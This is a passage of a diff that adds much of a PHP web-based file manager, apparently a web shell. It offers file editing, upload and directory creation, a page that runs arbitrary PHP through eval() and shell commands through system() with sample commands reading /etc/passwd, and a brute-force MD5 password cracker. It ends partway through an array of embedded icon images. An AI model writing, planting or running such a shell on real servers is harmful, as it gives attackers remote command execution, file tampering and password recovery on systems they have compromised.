+ echo "".mm("DONE")."!<p>";
+ echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+ echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+ break;
+
+
+
+
+case "e": // edit
+
+ if (!$write_access) exitw();
+
+ if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+ echo $GLOBALS['html'];
+ up($d,$f);
+ echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+ up_link($d,$f);
+ $msg="";
+ if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+ else fclose($fi);
+ if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+ else fclose($fi);
+ if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+ echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+ if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+ echo "<form action=$self method=post>
+ <input type=hidden name=c value=e_submit>
+ <input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+ <input type=hidden name=f
value=\"".htmlspecialchars($f)."\">
+ <textarea name=text cols=70 rows=20 style='width: 100%;'>".
+ htmlspecialchars(fread($fi,filesize($d.$f)))."</textarea><p>
+ <input type=submit value=' ".mm("SAVE FILE (write to disk)")." '>
+ <input type=checkbox name=confirm value=1 id=conf>
+ <label for=conf><font color=red><b><= confirm</b></font></label>
+ </form>";
+
+ break;
+
+
+case "e_submit":
+
+ if (!$write_access) exitw();
+
+ if (!realpath($d.$f) || !file_exists($d.$f)) exit("file not found");
+ if (!isset($text)) exit("err# e_submit 1");
+ if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+ if (!$fi=@fopen($d.$f,"w+")) exit("access denied");
+ fwrite($fi,$text);
+ fclose($fi);
+ Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+ echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">SAVE DONE (go back)!</a>";
+
+ break;
+
+
+
+case "newfile_submit":
+
+ if (!$write_access) exitw();
+
+ if (!isset($text) || !isset($df)) exit("err# newfile_submit 1");
+ if (!isset($confirm)) exit("Confirm not found (go back and set checkbox)");
+ if (!$fi=@fopen($df,"w+")) exit("access denied, can't create/open [$df]");
+ fwrite($fi,$text);
+ fclose($fi);
+ Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+ echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+ break;
+
+
+case "fileupload_submit":
+
+ if (!$write_access) exitw();
+ if (!isset($df)) exit("err# newfile_submit 1");
+ if (!isset($df3)) exit("err# newfile_submit 2");
+
+ $fname="";
+ if (isset($df2)) {
+ if (!preg_match("~([^/]+)$~",$HTTP_POST_FILES['userfile']['name'],$ok)) {
+ exit("Upload failed: can't detect file name");
+ }
+ $fname=$ok[1];
+ }
+ else {
+ $fname=$df3;
+ }
+ if ($fname=="")
+ exit("".mm("You mast checked 'create file name automatic' OR typed file name!")."");
+ if (isset($df4)) $fname=strtolower($fname);
+
+ echo "Temp file: ".$HTTP_POST_FILES['userfile']['tmp_name']."<br>";
+ echo "Origin file name:
".$HTTP_POST_FILES['userfile']['name']."<br>";
+ echo "File size: ".$HTTP_POST_FILES['userfile']['size']."<br>";
+ if ($df[strlen($df)-1]!="/") $df.="/";
+ echo "".mm("SAVING TO").": <font color=blue>$df</font><font color=red><b>$fname</b></font><p>";
+
+ ob();
+ $ok=copy($HTTP_POST_FILES['userfile']['tmp_name'],"$df$fname");
+ obb();
+ if (!$ok) exit("<font color=red><b>".mm("Sorry, access denied")."</b></font> $obb");
+
+ if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+ Header("Location: $ref");
+ echo "<a href='$ref'>NEW FILE SAVED</a>";
+
+ break;
+
+
+case "newdir_submit":
+
+ if (!$write_access) exitw();
+ if (!isset($df)) exit("err# newdir_submit 1");
+ ob();
+ if (!mkdir($df,$mkdir_mode)) {
+ obb();
+ exit("Access denied $obb");
+ }
+ obb();
+ if (!isset($ref)) $ref="$self?c=l&d=".urlencode($df);
+ Header("Location: $ref");
+ echo "<a href='$ref'>Go to new directory!</a>";
+
+ break;
+
+
+case "t":
+
+ echo "<h3>
+ <a href='$self'>START PAGE</a> |
+ <a href='$self?c=t'>Eval/Shell</a> |
+ <a href='$self?c=codes'>Character map</a>
+ </h3>";
+
+
+ if (!$write_access) exitw();
+ error_reporting(2038);
+
+ if (!isset($php)) {
+ $php="/* line 1 */\n\n// ".mm("for example, uncomment next line").":\nphpinfo();\n\n//readfile(\"/etc/passwd\");\n\n/* line 8 */";
+ $skipphp=1;
+ $pre='checked';
+ $nlbr='';
+ $xmp='';
+ $htmls='checked';
+ }
+
+ echo "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"&lt;?\" ".mm("and")." \"?&gt;\")
+<form action=$self method=post>
+<input type=hidden name=c value=t>
+<textarea name=php rows=".(!isset($skipphp)?10:4)."
cols=60 style='width:100%;'>$php</textarea> +<input type=checkbox name=pre value='checked' $pre id='pre'> + <label for='pre'> add &lt;pre&gt;</label> &nbsp; +<input type=checkbox name=xmp value='checked' $xmp id='xmp'> + <label for='xmp'> add &lt;xmp&gt;</label> &nbsp; +<input type=checkbox name=htmls value='checked' $htmls id='htmls'> + <label for='htmls'> add htmlspecialchars()</label> &nbsp; +<input type=checkbox name=nlbr value='checked' $nlbr id='nlbr'> + <label for='nlbr'> add nl2br()</label><br> +<input type=submit></form> +<P>"; + + if (!isset($shell)) $skipshell=1; + + if (!isset($skipphp)) { + echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; + if ($pre<>'') echo "<pre>"; + if ($xmp<>'') echo "<xmp>"; + if ($nlbr<>'' || $htmls<>'') { + ob_start(); + } + if ($phpeval_access) eval($php); + else die("Sorry, function eval() disabled."); + if ($nlbr<>'' || $htmls<>'') { + $tmp=ob_get_contents(); + ob_end_clean(); + if ($htmls<>'') $tmp=htmlspecialchars($tmp); + if ($nlbr<>'') $tmp=nl2br($tmp); + echo $tmp; + } + if ($xmp<>'') echo "</xmp>"; + if ($pre<>'') echo "</pre>"; + echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; + echo "</table></table></table></table></table></table></table></table></table></center></table><hr size=1 noshade>"; + } + + if (!isset($shell)) { + $shell="#".mm("example (remove comments '#')").": \n\n#cat /etc/passwd;\n\n#ps -ax\n\n#uname -a"; + $skipshell=1; + } + echo "<P><b>".mm("Shell commands")."</b> +<form action=$self method=post> +<input type=hidden name=c value=t> +<textarea name=shell rows=".(!isset($skipshell)?10:4)." 
cols=60 style='width:100%;'>$shell</textarea><br> +<input type=submit></form> +<P>"; + if (!isset($skipshell)) { + echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>"; + if ($system_access) system($shell); + else die("Sorry, function system() disabled."); + echo "</xmp>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n + </table></table></table></table></table></table></table></table></table></center><hr size=1 noshade>"; + } + + + $ttype=array(1=>"MD5",7=>"Decode MD5 (password crack)<br>", + 2=>"Base64",3=>"Base64 + chunk",4=>"Base64 + chunk + quotes", + 5=>"Decode Base64<br>", + 6=>"UnixTime=>Date(".time().")", + 8=>"MKtime: YYYY MM DD [hh [mm [ss]]]<br>", + 9=>"Translit=&gt;RusText", 14=>"RusText=&gt;Translit<br>", + 10=>"cp1251=&gt;koi8r",11=>"koi8r=&gt;cp1251",12=>"cp1251=&gt;mac",13=>"mac=&gt;cp1251", + 15=>"koi8r=&gt;mac",16=>"mac=&gt;koi8r", + ); + echo "<P><b>".mm("Universal convert")."</b>"; + + echo "<a name=convert></a><form action='$self#convert' method=post>"; + foreach ($ttype as $k=>$v) + echo "&nbsp;&nbsp;<nobr><input ".($k==$name?"checked":"")." type=radio name=name value=$k id=x$k><label for=x$k>$v</label></nobr> "; + + echo " +<input type=hidden name=c value=t> +<textarea name=convert rows=".(isset($convert)?10:3)." 
cols=60 style='width:100%;'>".htmlspecialchars($convert)."</textarea><br> +<input type=submit><br>"; + + + $russtr1="JCUKENGZH_FYVAPROLDESMIT_Bjcukengzh_fyvaproldesmit_b"; + $russtr2="ةضستإحأاصعشغآہدذخثؤفرجبزـءéَِêهيمçُْôûâàïًîëن‎ٌىèٍüل"; + function from_translit($ss) { + global $russtr1,$russtr2; + $w=array("Sch",'ظ',"SCH",'ظ',"ScH",'ظ',"SCh",'ظ',"sch",'ù',"Jo",'¨',"JO",'¨',"jo",'¸', + "Zh",'ئ',"ZH",'ئ',"zh",'و',"Ch",'×',"CH",'×',"ch",'÷',"Sh",'ط',"SH",'ط',"sh",'ّ', + "##",'ع',"''",'ـ',"Eh",'ف',"EH",'ف',"eh",'‎',"Ju",'ق',"JU",'ق',"ju",'‏',"Yu",'ق', + "YU",'ق',"yu",'‏',"YA","ك","Ya","ك","ya","ے","Ja",'ك',"JA",'ك',"ja",'ے'); + $c=count($w); + for ($i=0; $i<$c; $i+=2) $ss=str_replace($w[$i],$w[$i+1],$ss); + $ss=strtr($ss,$russtr1,$russtr2); + $ss=preg_replace("!([à-ے]+)~([à-ے]+)!is","\\1\\2",$ss); + return $ss; + } + function to_translit($ss) { + global $russtr1,$russtr2; + $ss=strtr($ss,$russtr2,$russtr1); + $ss=str_replace( + array('ط', 'ظ', 'ئ', 'ك', '×', 'ق', '¨', 'ّ', 'ù', 'و', 'ے', '÷', '‏', '¸', ), + array('SH','SCH','ZH','YA','CH','YU','YO','sh','sch','zh','ya','ch','yu','yo',), + $ss); + return $ss; + } + + if (isset($convert)) { + if (!isset($name)) $name="0"; + $out=""; + switch ($name) { + + case 1: + $out=md5($convert); + break; + + case 2: + $out=base64_encode($convert); + break; + + case 3: + $out=chunk_split(base64_encode($convert)); + break; + + case 4: + $out=base64_encode($convert); + $out=substr(preg_replace("!.{1,76}!","'\\0'.\n",$out),0,-2); + break; + + case 5: + $out=base64_decode($convert); + break; + + case 6: + $convert=intval($convert); + if ($convert==0) $convert=time(); + $out="Unixtime=$convert\n---Day/Month/Year--\n". + date("d/m/Y H:i:s",$convert)."\n". + date("d-m-Y H:i:s",$convert)."\n". + date("d.m.Y H:i:s",$convert)."\n". + "---Month/Day/Year--\n". + date("m/d/Y H:i:s",$convert)."\n". + date("m-d-Y H:i:s",$convert)."\n". + date("m.d.Y H:i:s",$convert)."\n". + "---------SQL-------\n". + date("Y-m-d H:i:s",$convert)."\n". 
+ date("Y m d H i s",$convert)."\n". + date("YmdHis",$convert); + break; + + case 8: + $c=explode(" ",trim(preg_replace("! +!"," ",$convert))); + if (count($c)<3 || count($c)>6) $out="Bad value. Type: 2000 12 31 or 2000 12 31 12 59 59"; + else { + if (empty($c[0])) $c[0]=1970; + if ($c[0]<50) $c[0]=2000+$c[0]; + if ($c[0]>50 && $c[0]<100) $c[0]=1900+$c[0]; + if (empty($c[1])) $c[1]=1; + if (empty($c[2])) $c[2]=1; + if (empty($c[3])) $c[3]=0; + if (empty($c[4])) $c[4]=0; + if (empty($c[5])) $c[5]=0; + $out="TIME: $c[0]-$c[1]-$c[2] $c[3]:$c[4]:$c[5]\nMKTIME: ".mktime($c[3],$c[4],$c[5],$c[1],$c[2],$c[0]); + } + break; + + case 9: + $out=from_translit($convert); + break; + + case 14: + $out=to_translit($convert); + break; + + case 10: $out=convert_cyr_string($convert,'w','k'); break; + case 11: $out=convert_cyr_string($convert,'k','w'); break; + case 12: $out=convert_cyr_string($convert,'w','m'); break; + case 13: $out=convert_cyr_string($convert,'m','w'); break; + case 15: $out=convert_cyr_string($convert,'k','m'); break; + case 16: $out=convert_cyr_string($convert,'m','k'); break; + + case 7: + echo "<script>top.location.href='$self?c=md5crack&text=$convert'</script>"; + break; + + case 0: + $out="Please select anythink function in list. Example: type 'test' and select 'md5'. 
Then click 'Submit'."; + break; + + default: + $out='Sorry, this function not work (try new versions)'; + } + echo "<P><hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<pre><xmp>$out</xmp></pre>\n\n\n\n\n\n\n\n\n<hr size=1 noshade>"; + } + + break; + + +case "md5crack": + + echo "<form action=$self name=main><input type=hidden name=c value=md5crack> + <h2>Decode MD5 (<a href=$self>home</a>|<a href=$self?c=t&name=1#convert>md5</a>)</h2><P>"; + + if (!isset($go)) { + if (!isset($fullqty)) $fullqty=""; + if (!isset($fulltime)) $fulltime=""; + if (!isset($php)) $php=""; + if (!isset($from)) $from=""; + echo "<b>STRING</b>: <input type=text name=text value='$text' size=40> (only 32 char: 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f)"; + echo "<P><b>Range</b>: <input type=text name=php value=\"".htmlspecialchars($php)."\" size=90><br>"; + $chars=array( + 'a-z'=>"abcdefghijklmnopqrstuvwxyz", + 'a-z,A-Z'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", + 'a-z,0-9'=>"abcdefghijklmnopqrstuvwxyz0123456789", + 'a-z,A-Z,0-9'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", + 'a-z,A-Z,0-9,other'=>"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~`!@#\$%^&*()_+-=[]{};:,<.>/\"'\\"); + $i=0; + foreach ($chars as $k=>$v) { + echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\",$v))."\"</script> + <a href='' onclick=\"document.main.php.value=str$i;return false\">$k</a> &nbsp; "; + $i++; + } + echo "<P> + <b>Start from</b>: <input type=text size=70 name=from value='$from'><P> + <input type=hidden name=go value=1> + <input type=hidden name=fullqty value=$fullqty> + <input type=hidden name=fulltime value=$fulltime> + <input type=submit value='Start!'><form>"; + } + else { + + function mdgetword() { + global $php,$from,$word; + $word=""; + for ($i=0; $i<count($from); $i++) $word.=$php[$from[$i]]; + } + + $fulltime=@intval($fulltime); + $fullqty=@intval($fullqty); + + $text=strtolower($text); + if (!preg_match("!^[0-9a-f]{32}$!",$text)) 
exit("md5 bad format: must be 32 bytes, range 0-9,a,b,c,d,e,f"); + if (!isset($php) || strlen($php)==0) $php="qwertyuiopasdfghjklzxcvbnm"; + if (!isset($from) || !preg_match("!^([0-9]+):(([0-9]+,)*[0-9]+)$!",$from,$ok)) { + $pos=0; + $from=0; + } + else { + $pos=$ok[1]; + $from=$ok[2]; + } + $from=explode(",",$from); + if (!is_array($from) || !count($from) || count($from)==1 && $from[0]==0) { + $from=array(0); + if (md5("")===$text) exit("** DONE **<br><br>md5('')=$text<br><br>(try empty string, 0 bytes!)"); + } + $phplen=strlen($php); + mdgetword(); + $poslen=strlen($word); + if ($pos<0 || $pos>=$poslen) $pos=0; + + for ($i=0; $i<10; $i++) { echo "<!-- -->\r\n"; flush(); } + + echo "<h3><a href='$self?c=md5crack". + "&from=".urlencode("$pos:".implode(",",$from)). + "&text=".urlencode($text). + "&php=".urlencode($php). + "&fulltime=$fulltime&fullqty=$fullqty". + "'>Save this link</a> - click for break and save current position</h3>"; + flush(); + + echo " + MD5_HASH=$text<br> + CURRENT_WORD=$word<br> + CURRENT_DIGIT=$pos:".implode(",",$from)."<br> + RANGE=".htmlspecialchars($php)."<br> + ProcessTime=$fulltime sec (".(floor($fulltime/60/60))."h)<br> + Calculation(qty)={$fullqty}0000<p><font face=courier>"; + flush(); + + + $fullsum=pow($phplen,$poslen); + $time1=time(); + $i=0; + + while (1) { + + $i++; + if ($i>50000) { + $time=time()-$time1; + if ($time>20) break; + $i=0; + $sum=0; + for ($j=1; $j<count($from); $j++) $sum+=$from[$j]*pow($phplen,$j); + printf("<nobr><b>%02.2f%%</b> ($word) %02dsec |</nobr> \r\n", + $sum*100/$fullsum,$time); + flush(); + $fullqty+=5; + } + + if (md5($word)===$text) + exit("<P><font color=red size=+1><b>** DONE **<P><tt>[$word]=[$text]</tt></b></font> + <script> window.focus(); window.focus(); setTimeout(\"alert('Done!')\",100);</script>"); + $from[$pos]++; + if ($from[$pos]==$phplen) { + $flag=1; + $from[$pos]=0; + $word[$pos]=$php[0]; + for ($pos=$pos+1; $pos<$poslen; $pos++) { + if ($from[$pos]+1<$phplen) { + $from[$pos]++; + 
$word[$pos]=$php[$from[$pos]]; + $flag=0; + $pos=0; + break; + } + else { + $from[$pos]=0; + $word[$pos]=$php[0]; + } + } + if ($flag) { + $from[]=0; + $poslen=count($from); + $word.=$php[0]; + $pos=0; + $fullsum=pow($phplen,$poslen); + } + } + $word[$pos]=$php[$from[$pos]]; + } + + $fulltime+=time()-$time1; + if ($i>5000) $fullqty++; + $url="$self?c=md5crack". + "&from=".urlencode("$pos:".implode(",",$from)). + "&text=".urlencode($text). + "&php=".urlencode($php). + "&fulltime=$fulltime&fullqty=$fullqty&go=1"; + echo "<script>location.href=\"$url\"</script><a href='$url'>click here</a>"; + + } + + break; + + +case "phpinfo": + + phpinfo(); + break; + + +case "codes": + + error_reporting(2039); + if (!isset($limit)) $limit=999; + if (!isset($fontsize)) $fontsize="300%"; + + echo "<h3> + <a href='$self'>START PAGE</a> | + <a href='$self?c=t'>Eval/Shell</a> | + <a href='$self?c=codes'>Character map</a> + </h3>"; + + echo "<h3>".mm("Character map (symbol codes table)")."</h3> + <form action=$self method=get> + <input type=hidden name=c value=\"codes\"> + <select name=fontname size=1> + <option value='Webdings'>====[ ".mm("Select font")." ]===="; + + foreach (array('Arial','Courier','Comic Sans MS','Fixedsys','Small fonts','Symbol', + 'System','Tahoma','Terminal','Times New Roman','Verdana', + 'Webdings','Wingdings','Wingdings 2','Wingdings 3') as $v) + echo "<option".($fontname==$v?" selected":"").">$v"; + + echo "</select> + ".mm("or type other")." + <input size=13 type=text name=fontname2 value=\"$fontname2\">. 
+ ".mm("Font size").": <input size=6 type=text name=fontsize value=\"$fontsize\">.<br> + ".mm("Code limit").": + <input type=radio name=limit value=255 id=a1 ".($limit==255?"checked":"")."><label for=a1>0-255</label> + <input type=radio name=limit value=999 id=a2 ".($limit==999?"checked":"")."><label for=a2>0-999 </label> + <input type=radio name=limit value=9999 id=a3 ".($limit==9999?"checked":"")."><label for=a3>0-9999</label> + <input type=submit value='".mm("Generate table")." !'></form><P>"; + + if (!isset($fontname)) break; + if (!empty($fontname2)) $fontname=$fontname2; + echo " + <STYLE> + .codes { font: $fontsize $fontname; text-align: center; } + .z { font: 12pt Fixedsys; color: #cccccc; } + </STYLE> + <table class=codes border=0 cellspacing=0 cellpadding=1>"; + ?> + <SCRIPT> + m=8; + n=1; + s=new String(""); + s=s+"<tr><td class=z>&amp;#0000;</td><td>&nbsp;</td>"; + for (i=1; i<=<?php echo $limit; ?>; i++) { + if (i<10) x="000"+i; + else if (i<100) x="00"+i; + else if (i<1000) x="0"+i; + else x=i; + if (n%m==0) s=s+"<tr>"; + s=s+"<td class=z>&amp;#"+x+";</td>"; + s=s+"<td>&#"+x+";</td>"; + if (n%m+1==m) s=s+"</tr>"; + if (s.length>500) { + document.write(s); + s="" + } + n++; + } + document.write(s); + </SCRIPT> + <?php + + echo "</table>"; + break; + + + +case "img": + + unset($img); +$img=array( +'dir'=> +'R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp'. +'/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=', +'fon'=> +'R0lGODlhQAYEALMAAAAAAP///6bK8A4obRs2eSlFhDZTkEVjnVRyqWKCtnCQwXyezIiq1pO24J3A'. +'6P///yH5BAEAAA8ALAAAAABABgQAAAT/cMhJq704E7n78EQXjmRpnmcRqizRsgUcz3Rt37QR63zR'. +'GzygcEgsGo8HYNKQbDKfh2Z0Sq1ar9goQsvdeg/eMGJMLpvPaHRivG4j3O14Yk6v2+/4u2K+7yf8'. +'Cn2Bg4SFhoeGC4GKjAqNC4yQkpOUlZaTDJCZmwubngygoaKjpKUNDKepqKipDa6vsLGysg4Ntbe2'. +'tg63u72+v8AOArvDxcLFAsnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx'. 
+'8vPSGfb3GCAfHBP6IvwgRKBIscJFwREvXMRYkVCGQhw1dPiYSJHiDx8SLwLBeKSjkyUg/5VAGRnl'. +'CUkmWVKCWfmF5UqXX8bAZJmmJpubbt6QWaNzTs+ccOTkwbPnj9GjfIwCKspUqSBEiRxJnbpI6qNG'. +'Vh1d2sopUydNYEF18tp1bClTq06JUqvK1aq0rGbNwvUKl11deIP9Mkasr7Fkwo4do0e4sOHDiBMr'. +'Xsy4sePHkCNLnkzZHL7LmC9s2LdZ34eAAkOjUGGCNAyEBhkqfDiDNcTXGS1O7IFx9sYhHDuKRCIy'. +'pBSSUqgAV7kFS/GXMcHIXK6cDEybOm+e4emzp/Wgdd7E0T50aNNAdADxeTroT3moVQspWrT+0dRI'. +'k7Ju/VrJK/2ynsyG+nr2LSlVrMCVlsIsA8pVCyx05bJLXrzoFQxff0WITGUUVmjhhRhmqOGGHHbo'. +'4YcgepPZiP3wA9A+nJ0o0GchsDjQiwaRFiNCL7R2Wo2vRZRDRbJpdJsQueWm2xImfdTbbkYKNwUU'. +'KjXp0pPMJScGTdBVeZ10V2J3XXdEJaWUHUWZ9yV4ZDqFHnrrZVWVe5VYNZ8l9pF1H3/87ddVf6Oo'. +'JSCAcMHSp1wGKujKXQsGo8uDvgwTWGCKKjMYYCFGKumklFZq6aWYZqrppstEAAA7', +'mode'=> +'R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO'. +'2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/'. +'dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=', + +'refresh'=> +'R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA'. +'AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY'. +'3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ'. +'R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=', +'search'=> +'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//'. +'/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap'. +'s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD'. +'AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr'. +'Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==', +'setup'=> +'R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC'. +'QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA'. +'ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB'. 
+'qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE'. +'OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==', +'up'=> +'R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA'. +'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg'. +'+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV'. +'IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==', +'sort_asc'=> +'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa'. +'SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==', +'sort_desc'=> +'R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb'. +'SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=', +'exe'=> +'R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7'. +'WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt'. +'xhIAOw==', +'html'=> +'R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz'. +'c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P'. +'KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk'. +'Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR'. +'ADs=', +'txt'=> +'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ'. +'SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7'. +'UpPWG3Ig6Hq/XmRjuZwkAAA7', +'unk'=> +'R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANE'. +'SLPcSzCqQKsVQ8JhexBBJnGVYFZACowleJZrRH7lFW8eDbMXaPO1juA2uXiGwBwFKRMeiTPlByrd'. +'yUzYbJao6npVkQQAOw==', +'php'=> +'R0lGODlhEwAQALMAAAAAAP///9fX3d3f7s/S5F1qpmJpjKOqyr7D27i80K+ywEtam4OIk+T/AO7u'. +'7v///yH5BAEAAA8ALAAAAAATABAAAAR08D0wK71VSna47yBHadxhnujRqKRJvC+SJIPKbgJR7DzP'. +'NECNgNFbGI/HhmZQWASezugzsFBKdtJsoEA1aLBTJzTMIDWpRqr6mFgyounswiAgDYjY/FwxGD1K'. 
+'BAMIg4MJCg41fiUpjAeKjY1+EwCUlZaVGhEAOw==',
+'img'=>
+'R0lGODlhEwAQALMAAAAAAP///6CgpHFzcVe2Osz/mbPmZkRmAPj4+Nra2szMzLKyspeXl4aGhlVV'.
+'Vf///yH5BAEAAA8ALAAAAAATABAAAASA8KFJq00vozZ6Z4uSjGOTSV3DMFzTCGJ5boIQKsrqgoqp'.
+'qbabYsFq+SSs1WLJFLgGx82OUWMuXVEPdGcLOmcehziVtEXFjoHiQGCnV99fR4EgFA6DBVQ3c3bq'.
+'BIEBAXtRSwIsCwYGgwEJAywzOCGHOliRGjiam5M4RwlYoaJPGREAOw==',
+'edit'=>
+'R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze'.
+'EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61'.
+'LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==',
+'papki'=>
+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
